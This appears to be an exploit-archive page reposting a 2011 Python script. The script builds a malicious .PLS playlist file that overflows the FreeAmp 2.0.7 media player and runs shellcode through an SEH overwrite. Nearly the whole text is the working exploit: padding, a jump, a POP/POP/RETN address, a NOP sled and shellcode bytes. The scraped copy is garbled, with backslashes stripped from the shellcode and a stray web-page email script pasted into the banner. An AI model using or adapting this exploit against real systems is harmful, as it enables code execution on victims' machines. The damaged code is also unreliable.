Home / exploits FreeAmp 2.0.7 PLS Buffer Overflow
Posted on 25 June 2011
#!/usr/bin/python # #[+]Exploit Title: FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit #[+]Date: 24�62011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.exploit-db.com/application/17441/ #[+]Version: 2.0.7 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # # from struct import pack import os import sys from time import sleep if os.name == "nt": os.system("cls") os.system("color 4f") os.system("Title FreeAmp .PLS File Buffer Overflow Exploit") else: os.system("clear") print ''' FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script> ''' sleep(2) #Shellcode WinExec "Calc.exe" shellcode = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" "x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" "x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" "x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" "x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" "xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" "xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" "x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" "xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" "xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" "x7fxe8x7bxca") buf = ("x41" * 893) buf += ("xebx08x90x90") buf += pack('<L',0x004027BF)#POP/POP/RETN buf += "x90" * 20 buf += shellcode buf += "x41" * (30000-len(buf)) exploit = ('''[playlist] File1=http://'''+buf+''' NumberOfEntries=1 Version=2 ''') print " [+]Creating File Exploit.pls..." sleep(1) try: f = open("Exploit.pls","wb") f.write(exploit) f.close() print " [+]File Exploit.pls Created." sleep(2) except: print " [-]Error in Create file Exploit.pls" sleep(1)
